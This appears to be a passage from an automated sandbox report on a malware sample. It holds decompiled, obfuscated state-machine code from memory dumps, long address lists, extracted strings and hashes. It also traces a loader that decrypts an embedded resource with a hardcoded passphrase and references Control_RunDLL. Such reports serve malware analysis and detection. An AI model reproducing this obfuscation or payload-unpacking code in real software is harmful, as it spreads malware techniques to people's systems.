				_v160 = _v160 ^ 0x00003b29;
				_v476 = 0xddbc;
				_v476 = _v476 ^ 0xc2407c95;
				_v476 = _v476 + 0xd5a3;
				_v476 = _v476 + 0x8192;
				_v476 = _v476 ^ 0xc241f0f2;
				_v216 = 0xdff2;
				_t1372 = 0x2c;
				_v216 = _v216 * 0x1c;
				_v216 = _v216 ^ 0x00187743;
				_v516 = 0x400b;
				_v516 = _v516 / _t1218;
				_v516 = _v516 + 0xc836;
				_v516 = _v516 >> 0xa;
				_v516 = _v516 ^ 0x00004f08;
				_v292 = 0xdc4e;
				_v292 = _v292 * 0x16;
				_v292 = _v292 * 0x7f;
				_v292 = _v292 ^ 0x09643e15;
				_v600 = 0x4d46;
				_v600 = _v600 + 0xffff0db8;
				_v600 = _v600 + 0x84f3;
				_v600 = _v600 + 0xc039;
				_v600 = _v600 ^ 0x0000d5ed;
				_v432 = 0x8bd1;
				_v432 = _v432 << 0xc;
				_v432 = _v432 + 0x8a22;
				_v432 = _v432 / _t1372;
				_v432 = _v432 ^ 0x003284c4;
				_v288 = 0x245c;
				_v288 = _v288 | 0x526859ae;
				_v288 = _v288 * 0xc;
				_v288 = _v288 ^ 0xdce5b0ef;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1391 = _t1225 - 0x1bd1caec;
							if(_t1391 <= 0) {
							}
							L3:
							if(_t1391 == 0) {
								__eflags = E002502C3();
								if(__eflags == 0) {
									_t1135 = E00247903();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
									while(1) {
										L2:
										_t1391 = _t1225 - 0x1bd1caec;
										if(_t1391 <= 0) {
										}
										goto L3;
									}
								}
								_t1144 = E00247903();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1144 & 0x03449ef9;
								L32:
								_t1225 = _t1257 + 0xda99535;
								while(1) {
									L2:
									_t1391 = _t1225 - 0x1bd1caec;
									if(_t1391 <= 0) {
									}
									goto L54;
								}
								goto L3;
							}
							_t1392 = _t1225 - 0x10ee342e;
							if(_t1392 > 0) {
								__eflags = _t1225 - 0x15603e6b;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x159448ba;
									if(_t1225 == 0x159448ba) {
										E0024C562(_v540,  &_v80, _v332, _v192);
										_t1225 = 0x17799f6a;
										continue;
									}
									__eflags = _t1225 - 0x1653011b;
									if(_t1225 == 0x1653011b) {
										E0024F536(_v384, _v256, _v300, _v140);
										_t1225 = 0x21caf663;
										continue;
									}
									__eflags = _t1225 - 0x17799f6a;
									if(_t1225 == 0x17799f6a) {
										_t1138 = E00249A37( &_v112,  &_v132, _v460, _v548);
										asm("sbb ecx, ecx");
										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
										continue;
									}
									__eflags = _t1225 - 0x1b19f75b;
									if(_t1225 != 0x1b19f75b) {
										break;
									}
									_t1144 = E002573AC();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
									continue;
								}
								if(__eflags == 0) {
									_t1144 = E0024F444(_t1225);
									L112:
									return _t1144;
								}
								__eflags = _t1225 - 0x10f69b27;
								if(_t1225 == 0x10f69b27) {
									_t1144 = E0025AB96();
									_t1225 = 0x326a8235;
									continue;
								}
								__eflags = _t1225 - 0x11454f34;
								if(_t1225 == 0x11454f34) {
									_t1144 = E0024D7EB();
									_t1225 = 0x356cf65c;
									continue;
								}
								__eflags = _t1225 - 0x11dfa862;
								if(__eflags == 0) {
									_t1225 = 0x376e2cde;
									continue;
								}
								__eflags = _t1225 - 0x13c96655;
								if(_t1225 != 0x13c96655) {
									break;
								}
								_t1144 = E002462A3();
								goto L112;
							}
							if(_t1392 == 0) {
								_t1140 = E0024153C();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1140 & 0x061fd120;
								__eflags = _t1257;
								goto L32;
							}
							_t1393 = _t1225 - 0x55e3088;
							if(_t1393 > 0) {
								__eflags = _t1225 - 0x7ff6f9b;
								if(_t1225 == 0x7ff6f9b) {
									_t1336 = _v436;
									E0024F536(_v556, _t1336, _v564, _v80);
									_t1225 = 0x3140af28;
									continue;
								}
								__eflags = _t1225 - 0xb356ed5;
								if(_t1225 == 0xb356ed5) {
									_t1144 = E0024C2E2();
									_v104 = _t1144;
									_t1225 = 0x288da576;
									continue;
								}
								__eflags = _t1225 - 0xd8c7d27;
								if(_t1225 == 0xd8c7d27) {
									_push( &_v68);
									_t1336 = _v572;
									_t1144 = E00252349(_v280, _t1336, _v468, _v580, _t1225);
									_t1387 = _t1387 + 0x10;
									__eflags = _t1144;
									if(__eflags == 0) {
										L28:
										_t1225 = 0x15603e6b;
										continue;
									}
									_t1336 = _v316;
									_v112 =  &_v68;
									_t1144 = E0024DFE2(_v400, _t1336,  &_v68);
									_v108 = _t1144;
									_t1225 = 0x2267098;
									continue;
								}
								__eflags = _t1225 - 0xda99535;
								if(_t1225 != 0xda99535) {
									break;
								}
								E00257D03();
								_t1144 = E00248317();
								L25:
								_t1225 = 0x23233137;
								continue;
							}
							if(_t1393 == 0) {
								_t1144 = E002563C1();
								_t1225 = 0x3544b2a;
								continue;
							}
							if(_t1225 == 0x13a2b08) {
								_t1225 = 0x282d346f;
								continue;
							}
							if(_t1225 == 0x2267098) {
								_t1144 = E0025611C();
								_v72 = _t1144;
								_t1225 = 0xb356ed5;
								continue;
							}
							if(_t1225 == 0x2a32d0a) {
								_t1225 = 0x34a6f88;
								continue;
							}
							if(_t1225 == 0x34a6f88) {
								_t1144 = E00253632(__eflags);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L112;
								} else {
									_t1225 = 0x3833d453;
									continue;
								}
							}
							if(_t1225 != 0x3544b2a) {
								break;
							} else {
								_t1144 = E00251BDF();
								_t1225 = 0x371670b5;
								continue;
							}
							L54:
							__eflags = _t1225 - 0x2e6b2744;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x35bdcd5f;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x371670b5;
									if(_t1225 == 0x371670b5) {
										E00258F49();
										_t1225 = 0x30491502;
										break;
									}
									__eflags = _t1225 - 0x376e2cde;
									if(__eflags == 0) {
										_v148 = E0024F85D(_v472, __eflags,  &_v144, _v212, _v312, _v480);
										E002448BD( &_v148, _v204, _v456, _v464);
										_t1387 = _t1387 + 0x18;
										_t1336 = _v148;
										E00252025(_v304, _t1336, _v196, _v448);
										_t1225 = 0x13a2b08;
										continue;
									}
									__eflags = _t1225 - 0x37f9587b;
									if(__eflags == 0) {
										_v96 = 0x1346150;
										_t1225 = 0x2e6b2744;
										continue;
									}
									__eflags = _t1225 - 0x3833d453;
									if(_t1225 != 0x3833d453) {
										break;
									}
									_t1144 = E00256014(); // executed
									_t1225 = 0x1e57e2ba;
									continue;
								}
								if(__eflags == 0) {
									_t1336 = _v320;
									_t1144 = E0025A0AF(_v504, _t1336, _v512,  &_v88);
									_t1225 = 0x159448ba;
									continue;
								}
								__eflags = _t1225 - 0x30491502;
								if(_t1225 == 0x30491502) {
									_t1144 = E0024EE78();
									__eflags = _t1144;
									if(__eflags == 0) {
										goto L112;
									}
									_t1225 = 0x2a91822d;
									continue;
								}
								__eflags = _t1225 - 0x3140af28;
								if(_t1225 == 0x3140af28) {
									_t1336 = _v228;
									_t1144 = E0024F536(_v328, _t1336, _v336, _v88);
									goto L25;
								}
								__eflags = _t1225 - 0x326a8235;
								if(__eflags == 0) {
									_t1336 =  &_v124;
									_t1144 = E002571EF(_t1336, __eflags, _v528);
									__eflags = _t1144;
									if(__eflags != 0) {
										asm("xorps xmm0, xmm0");
										asm("movlpd [esp+0x1d0], xmm0");
									}
									L95:
									_t1225 = 0x1653011b;
									continue;
								}
								__eflags = _t1225 - 0x356cf65c;
								if(_t1225 != 0x356cf65c) {
									break;
								}
								_t1144 = E002567F0();
								_t1225 = 0x13c96655;
								continue;
							}
							if(__eflags == 0) {
								_v92 = 0x1388;
								_t1225 = 0x35bdcd5f;
								continue;
							}
							__eflags = _t1225 - 0x23233137;
							if(__eflags > 0) {
								__eflags = _t1225 - 0x2596cdc9;
								if(_t1225 == 0x2596cdc9) {
									_push(_v388);
									_push(_v584);
									_push(_v380);
									_t1336 = _v260;
									_push( &_v132);
									_push( &_v140);
									_t1172 = E00249FDC(_t1336);
									_t1389 = _t1387 + 0x14;
									__eflags = _t1172;
									if(_t1172 == 0) {
										E0024790F();
										E002478A5(_t1225, _t1225, 0x1f40, _t1225, 0xfa0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00248317();
										_t1225 = 0x21caf663;
										asm("adc ebx, 0x0");
									} else {
										_t1384 = 0x35bdcd5f;
										_t1213 = E002478A5(_t1225, _t1225, 0xef420, _t1225, 0xdbba0);
										_t1387 = _t1389 + 0x10;
										_t1144 = E00248317();
										_t1224 = _t1336;
										_t1348 = _t1144 + _t1213;
										_t1225 = 0x21c9d3c7;
										asm("adc ebx, 0x0");
									}
									while(1) {
										L1:
										goto L2;
									}
								}
								__eflags = _t1225 - 0x282d346f;
								if(_t1225 == 0x282d346f) {
									_t1384 = 0xd8c7d27;
									_t1186 = E002478A5(_t1225, _t1225, 0x2ee0, _t1225, 0xfa0);
									_t1387 = _t1387 + 0x10;
									_t1144 = E00248317();
									_t1224 = _t1336;
									_t1348 = _t1144 + _t1186;
									_t1225 = 0x23233137;
									asm("adc ebx, 0x0");
									goto L1;
								}
								__eflags = _t1225 - 0x288da576;
								if(_t1225 == 0x288da576) {
									_t1144 = E0024F326();
									_v100 = _t1144;
									_t1225 = 0x37f9587b;
									continue;
								}
								__eflags = _t1225 - 0x2a91822d;
								if(_t1225 != 0x2a91822d) {
									break;
								}
								E00253895();
								_t1144 = E00247903();
								asm("sbb ecx, ecx");
								_t1225 = ( ~_t1144 & 0xdbd858d8) + 0x356cf65c;
								continue;
							}
							if(__eflags == 0) {
								_t1144 = _t1348 | _t1224;
								__eflags = _t1144;
								if(_t1144 != 0) {
									_t1199 = E002478A5(_t1225, _t1225, 0x4b0, _t1225, 0x190);
									_t1387 = _t1387 + 8;
									_t1336 = _t1199;
									_t1144 = E00253F62(_t1336, __eflags);
									__eflags = _t1144;
									if(__eflags != 0) {
										goto L28;
									}
									_t1144 = E00248317();
									__eflags = _t1336 - _t1224;
									if(__eflags < 0) {
										L74:
										_t1225 = 0x23233137;
										break;
									}
									if(__eflags > 0) {
										goto L69;
									}
									__eflags = _t1144 - _t1348;
									if(_t1144 >= _t1348) {
										goto L69;
									}
									goto L74;
								}
								L69:
								_t1225 = _t1384;
								break;
							}
							__eflags = _t1225 - 0x1d55cf6f;
							if(_t1225 == 0x1d55cf6f) {
								_t1144 = E002512E2();
								goto L112;
							}
							__eflags = _t1225 - 0x1e57e2ba;
							if(_t1225 == 0x1e57e2ba) {
								_t1144 = E00254B41();
								__eflags = _t1144;
								if(_t1144 == 0) {
									goto L112;
								}
								_t1144 = E002584C4(_v360);
								_t1225 = 0x1b19f75b;
								continue;
							}
							__eflags = _t1225 - 0x21c9d3c7;
							if(_t1225 == 0x21c9d3c7) {
								_t1336 = _v524;
								_t1144 = E00253FE7( &_v124, _t1336, _v240,  &_v140);
								__eflags = _t1144;
								if(__eflags == 0) {
									goto L95;
								}
								_t1144 = E002567E9();
								__eflags = _v116;
								_t1225 = 0x10f69b27;
								if(__eflags != 0) {
									__eflags = _v116 - 7;
									_t1225 =  ==  ? 0x1d55cf6f : 0x10f69b27;
								}
								continue;
							}
							__eflags = _t1225 - 0x21caf663;
							if(_t1225 != 0x21caf663) {
								break;
							}
							_t1336 = _v444;
							_t1144 = E0024F536(_v368, _t1336, _v532, _v132);
							_t1225 = 0x7ff6f9b;
						}
						__eflags = _t1225 - 0x3adf5394;
					} while (__eflags != 0);
					goto L112;
				}
			}

0x00242c69
0x00242c6f
0x00242c7d
0x00242c88
0x00242c8d
0x00242c97
0x00242c9c
0x00242ca2
0x00242ca7
0x00242caf
0x00242cba
0x00242ccd
0x00242cd0
0x00242cd7
0x00242ce2
0x00242ced
0x00242cf8
0x00242d0e
0x00242d15
0x00242d20
0x00242d2b
0x00242d3a
0x00242d3f
0x00242d48
0x00242d50
0x00242d5b
0x00242d66
0x00242d6e
0x00242d79
0x00242d8b
0x00242d8e
0x00242d9d
0x00242da4
0x00242daf
0x00242dc2
0x00242dc9
0x00242dd4
0x00242ddf
0x00242dea
0x00242df5
0x00242e00
0x00242e0b
0x00242e16
0x00242e21
0x00242e2c
0x00242e34
0x00242e3f
0x00242e4a
0x00242e55
0x00242e5d
0x00242e68
0x00242e73
0x00242e7e
0x00242e89
0x00242e94
0x00242e9f
0x00242eac
0x00242eb7
0x00242ec2
0x00242ecd
0x00242ed8
0x00242ee3
0x00242eee
0x00242ef9
0x00242f01
0x00242f0c
0x00242f17
0x00242f2c
0x00242f2f
0x00242f30
0x00242f37
0x00242f42
0x00242f4d
0x00242f58
0x00242f6e
0x00242f75
0x00242f80
0x00242f8b
0x00242f96
0x00242fa1
0x00242fac
0x00242fb7
0x00242fbf
0x00242fca
0x00242fd2
0x00242fda
0x00242fdf
0x00242fe7
0x00242fef
0x00242ffa
0x00243005
0x00243010
0x00243025
0x0024302c
0x00243037
0x00243042
0x0024304d
0x00243058
0x00243063
0x00243076
0x0024307d
0x00243088
0x00243093
0x0024309e
0x002430a9
0x002430b4
0x002430c6
0x002430c9
0x002430d0
0x002430db
0x002430e6
0x002430f3
0x002430f7
0x002430ff
0x00243104
0x0024310c
0x00243117
0x00243122
0x0024312d
0x00243138
0x0024314b
0x00243154
0x0024315f
0x00243167
0x0024316f
0x00243177
0x0024317c
0x00243184
0x00243192
0x00243197
0x002431a1
0x002431a4
0x002431ad
0x002431b1
0x002431b9
0x002431cc
0x002431d3
0x002431de
0x002431e9
0x002431f4
0x002431ff
0x00243207
0x00243212
0x0024321d
0x00243228
0x00243230
0x0024323b
0x00243246
0x00243251
0x0024325c
0x00243267
0x00243272
0x0024327a
0x00243285
0x00243290
0x00243298
0x002432a3
0x002432ab
0x002432b6
0x002432c1
0x002432c9
0x002432d4
0x002432df
0x002432ea
0x002432f5
0x00243300
0x0024330b
0x00243316
0x0024331e
0x00243329
0x00243334
0x00243347
0x0024334e
0x00243359
0x00243364
0x0024336f
0x0024337a
0x00243385
0x00243390
0x0024339b
0x002433a6
0x002433ae
0x002433b9
0x002433c1
0x002433ce
0x002433d2
0x002433da
0x002433e2
0x002433ed
0x002433f5
0x00243402
0x0024340d
0x00243418
0x00243423
0x0024342e
0x00243439
0x00243444
0x0024344f
0x00243457
0x00243465
0x0024346a
0x00243470
0x00243474
0x0024347c
0x00243487
0x00243492
0x0024349d
0x002434a8
0x002434b3
0x002434bb
0x002434c3
0x002434c8
0x002434d0
0x002434db
0x002434e6
0x002434f1
0x002434fc
0x0024350e
0x00243513
0x0024351c
0x00243527
0x00243532
0x0024353d
0x00243548
0x00243550
0x0024355b
0x00243566
0x00243571
0x0024357c
0x00243587
0x0024358f
0x0024359a
0x002435a2
0x002435af
0x002435b0
0x002435b4
0x002435bc
0x002435c4
0x002435cf
0x002435da
0x002435e5
0x002435f0
0x002435fb
0x00243606
0x00243611
0x00243619
0x0024361e
0x00243626
0x0024362b
0x00243633
0x00243647
0x0024364e
0x00243656
0x00243661
0x00243669
0x00243679
0x0024367e
0x00243684
0x0024368c
0x00243699
0x0024369c
0x002436a0
0x002436a8
0x002436b0
0x002436b8
0x002436c3
0x002436ce
0x002436d9
0x002436e4
0x002436ef
0x002436f7
0x00243702
0x0024370d
0x00243723
0x0024372a
0x00243735
0x00243740
0x0024374d
0x00243750
0x0024375c
0x00243760
0x00243765
0x0024376d
0x00243778
0x00243780
0x0024378b
0x0024379e
0x0024379f
0x002437a6
0x002437ae
0x002437b9
0x002437c1
0x002437c6
0x002437cb
0x002437d0
0x002437d8
0x002437e3
0x002437f6
0x002437fd
0x00243808
0x00243810
0x00243818
0x0024381d
0x00243822
0x0024382a
0x0024383d
0x0024384d
0x00243854
0x0024385f
0x0024386a
0x00243875
0x0024387d
0x00243888
0x00243890
0x0024389d
0x002438a1
0x002438a9
0x002438b3
0x002438be
0x002438c9
0x002438d1
0x002438dc
0x002438e4
0x002438e9
0x002438f1
0x002438f9
0x00243901
0x0024390c
0x00243917
0x00243922
0x0024392d
0x00243938
0x00243940
0x0024394b
0x00243953
0x00243958
0x00243960
0x00243965
0x0024396d
0x00243978
0x00243980
0x0024398b
0x00243993
0x0024399b
0x002439a9
0x002439ae
0x002439b4
0x002439bc
0x002439c4
0x002439c9
0x002439d1
0x002439d9
0x002439e1
0x002439f4
0x002439f7
0x002439fe
0x00243a09
0x00243a14
0x00243a1f
0x00243a2a
0x00243a35
0x00243a3d
0x00243a48
0x00243a53
0x00243a5e
0x00243a74
0x00243a82
0x00243a87
0x00243a90
0x00243a9b
0x00243aa6
0x00243ab1
0x00243abc
0x00243ac8
0x00243acb
0x00243acf
0x00243adc
0x00243ae0
0x00243ae8
0x00243b00
0x00243b09
0x00243b14
0x00243b1f
0x00243b2a
0x00243b35
0x00243b40
0x00243b53
0x00243b54
0x00243b5b
0x00243b63
0x00243b6e
0x00243b81
0x00243b90
0x00243b97
0x00243ba2
0x00243bad
0x00243bc1
0x00243bd0
0x00243bd7
0x00243be2
0x00243bef
0x00243bf3
0x00243bfd
0x00243c01
0x00243c09
0x00243c11
0x00243c16
0x00243c1e
0x00243c26
0x00243c2e
0x00243c41
0x00243c48
0x00243c53
0x00243c5e
0x00243c69
0x00243c71
0x00243c79
0x00243c7e
0x00243c86
0x00243c8e
0x00243c99
0x00243ca4
0x00243caf
0x00243cba
0x00243cc5
0x00243ccd
0x00243cd8
0x00243ce3
0x00243ceb
0x00243cf6
0x00243d01
0x00243d14
0x00243d23
0x00243d2a
0x00243d32
0x00243d3d
0x00243d48
0x00243d50
0x00243d5b
0x00243d66
0x00243d6e
0x00243d7b
0x00243d8f
0x00243d9b
0x00243da2
0x00243dad
0x00243db8
0x00243dc3
0x00243dce
0x00243dd9
0x00243de4
0x00243df9
0x00243e01
0x00243e08
0x00243e13
0x00243e2a
0x00243e2e
0x00243e36
0x00243e3b
0x00243e43
0x00243e56
0x00243e65
0x00243e6c
0x00243e77
0x00243e7f
0x00243e87
0x00243e8f
0x00243e97
0x00243e9f
0x00243eaa
0x00243eb2
0x00243ec6
0x00243ecd
0x00243ed8
0x00243ee3
0x00243ef6
0x00243efd
0x00243f08
0x00243f08
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f13
0x00243f13
0x00243f19
0x00243f19
0x00244295
0x00244297
0x002442cb
0x002442d4
0x002442dc
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f13
0x00243f13
0x00000000
0x00243f13
0x00243f0d
0x002442a7
0x002442b0
0x002442b2
0x0024411e
0x0024411e
0x00243f0d
0x00243f0d
0x00243f0d
0x00243f13
0x00243f13
0x00000000
0x00243f13
0x00000000
0x00243f0d
0x00243f1f
0x00243f25
0x00244129
0x0024412f
0x002441a9
0x002441af
0x00244278
0x0024427f
0x00000000
0x0024427f
0x002441b5
0x002441bb
0x0024424e
0x00244255
0x00000000
0x00244255
0x002441bd
0x002441c3
0x00244214
0x0024421f
0x00244227
0x00000000
0x00244227
0x002441c5
0x002441cb
0x00000000
0x00000000
0x002441df
0x002441e8
0x002441f0
0x00000000
0x002441f0
0x00244131
0x00244837
0x00244851
0x00244858
0x00244858
0x00244137
0x0024413d
0x0024419a
0x0024419f
0x00000000
0x0024419f
0x0024413f
0x00244145
0x00244184
0x00244189
0x00000000
0x00244189
0x00244147
0x0024414d
0x0024416c
0x00000000
0x0024416c
0x0024414f
0x00244155
0x00000000
0x00000000
0x00244162
0x00000000
0x00244162
0x00243f2b
0x0024410d
0x00244116
0x00244118
0x00244118
0x00000000
0x00244118
0x00243f31
0x00243f37
0x00243ffd
0x00244003
0x002440ea
0x002440f5
0x002440fc
0x00000000
0x002440fc
0x00244009
0x0024400f
0x002440c9
0x002440ce
0x002440d5
0x00000000
0x002440d5
0x00244015
0x0024401b
0x0024405c
0x00244069
0x00244074
0x00244079
0x0024407c
0x0024407e
0x002440b4
0x002440b4
0x00000000
0x002440b4
0x00244080
0x00244096
0x0024409d
0x002440a3
0x002440aa
0x00000000
0x002440aa
0x0024401d
0x00244023
0x00000000
0x00000000
0x00244034
0x00244042
0x0024404b
0x0024404b
0x00000000
0x0024404b
0x00243f3d
0x00243fee
0x00243ff3
0x00000000
0x00243ff3
0x00243f49
0x00243fdd
0x00000000
0x00243fdd
0x00243f55
0x00243fc7
0x00243fcc
0x00243fd3
0x00000000
0x00243fd3
0x00243f5d
0x00243faf
0x00000000
0x00243faf
0x00243f65
0x00243f98
0x00243f9d
0x00243f9f
0x00000000
0x00243fa5
0x00243fa5
0x00000000
0x00243fa5
0x00243f9f
0x00243f6d
0x00000000
0x00243f73
0x00243f81
0x00243f86
0x00000000
0x00243f86
0x002442e7
0x002442e7
0x002442ed
0x00244632
0x00244638
0x00244736
0x0024473c
0x00244818
0x0024481d
0x00000000
0x0024481d
0x00244742
0x00244748
0x002447b9
0x002447dc
0x002447e1
0x002447f2
0x00244800
0x00244807
0x00000000
0x00244807
0x0024474a
0x00244750
0x00244778
0x00244783
0x00000000
0x00244783
0x00244752
0x00244758
0x00000000
0x00000000
0x00244769
0x0024476e
0x00000000
0x0024476e
0x0024463e
0x0024471a
0x00244725
0x0024472c
0x00000000
0x0024472c
0x00244644
0x0024464a
0x002446f7
0x002446fc
0x002446fe
0x00000000
0x00000000
0x00244704
0x00000000
0x00244704
0x00244650
0x00244656
0x002446d2
0x002446e0
0x00000000
0x002446e6
0x00244658
0x0024465e
0x0024468a
0x00244691
0x00244697
0x00244699
0x0024469b
0x002446a3
0x002446b3
0x002446ba
0x002446ba
0x00000000
0x002446ba
0x00244660
0x00244666
0x00000000
0x00000000
0x00244670
0x00244675
0x00000000
0x00244675
0x002442f3
0x0024461d
0x00244628
0x00000000
0x00244628
0x002442f9
0x002442ff
0x00244463
0x00244469
0x0024453f
0x0024454d
0x00244551
0x00244558
0x0024455f
0x00244567
0x00244568
0x0024456d
0x00244570
0x00244572
0x002445c8
0x002445fb
0x00244600
0x00244605
0x00244610
0x00244615
0x00244574
0x00244578
0x002445a2
0x002445a7
0x002445ac
0x002445b3
0x002445b5
0x002445b7
0x002445bc
0x002445bc
0x00243f08
0x00243f08
0x00000000
0x00243f08
0x00243f08
0x0024446f
0x00244475
0x002444f3
0x0024451d
0x00244522
0x00244527
0x0024452e
0x00244530
0x00244532
0x00244537
0x00000000
0x00244537
0x00244477
0x0024447d
0x002444d6
0x002444db
0x002444e2
0x00000000
0x002444e2
0x0024447f
0x00244485
0x00000000
0x00000000
0x00244499
0x002444ac
0x002444b5
0x002444bd
0x00000000
0x002444bd
0x00244305
0x002443e8
0x002443e8
0x002443ea
0x0024441b
0x00244427
0x0024442e
0x00244437
0x0024443e
0x00244440
0x00000000
0x00000000
0x0024444a
0x0024444f
0x00244451
0x00244459
0x00244459
0x00000000
0x00244459
0x00244453
0x00000000
0x00000000
0x00244455
0x00244457
0x00000000
0x00000000
0x00000000
0x00244457
0x002443ec
0x002443ec
0x00000000
0x002443ec
0x0024430b
0x0024430d
0x0024484c
0x00000000
0x0024484c
0x00244313
0x00244319
0x002443c3
0x002443c8
0x002443ca
0x00000000
0x00000000
0x002443d7
0x002443dc
0x00000000
0x002443dc
0x0024431f
0x00244325
0x0024436c
0x00244377
0x0024437e
0x00244380
0x00000000
0x00000000
0x00244394
0x00244399
0x002443a1
0x002443a6
0x002443ac
0x002443b4
0x002443b4
0x00000000
0x002443a6
0x00244327
0x0024432d
0x00000000
0x00000000
0x0024433e
0x0024434c
0x00244353
0x00244353
0x00244822
0x00244822
0x00000000
0x0024482e

Strings

u, xrefs: 00243D3D
}%, xrefs: 002439D9
D>, xrefs: 002439E1
0vkX, xrefs: 00242EEE
QG)}, xrefs: 0024316F
71##, xrefs: 00244532
D'k., xrefs: 00244783
+!, xrefs: 00243B63
);, xrefs: 00243DA2
7Y, xrefs: 0024340D
71##, xrefs: 002442F9
c, xrefs: 00243CBA
n\, xrefs: 00243C8E
\$, xrefs: 00243ED8
71##, xrefs: 0024404B
C!), xrefs: 002438BE
,Bb*, xrefs: 00243C7E
nY, xrefs: 00243ABC
kU, xrefs: 002434E6
o4-(, xrefs: 00243FDD
~, xrefs: 00243633
D'k., xrefs: 002442E7
T5W, xrefs: 00243C53
;R,], xrefs: 002435E5
P&, xrefs: 00242ED8
d3, xrefs: 0024347C
I], xrefs: 0024378B
yI, xrefs: 00243251
G", xrefs: 00243A2A
FM, xrefs: 00243E77
q, xrefs: 002437D8
[ , xrefs: 00242E3F
=, xrefs: 002433B9
=<, xrefs: 00242D79
DP, xrefs: 00243CD8
k, xrefs: 00243246
o, xrefs: 00242E21
nlvJ, xrefs: 002435B4
71##, xrefs: 00244459
bY, xrefs: 002432DF
o4-(, xrefs: 0024446F
jd, xrefs: 00243184
ny, xrefs: 00243B6E

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
API String ID: 0-1872862241
Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction ID: 1253c6dfe33466d024844c5777399262d83214f8663d231665bcdaee2281d9d3
Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
Instruction Fuzzy Hash: 8ED212715193818BE378DF25C58ABDFBBE1BBC4304F10891DE19A862A0DBB49959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9

Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29

LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
_memmove.LIBCMT ref: 1000139C
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5

Strings

LdrAccessResource, xrefs: 10001282
jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx, xrefs: 1000134C
ntdll.dll, xrefs: 1000120F
Control_RunDLL, xrefs: 100013CB
LdrFindResource_U, xrefs: 10001241

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
API String ID: 2007481169-3150289311
Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70

Uniqueness

Uniqueness Score: -1.00%

Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
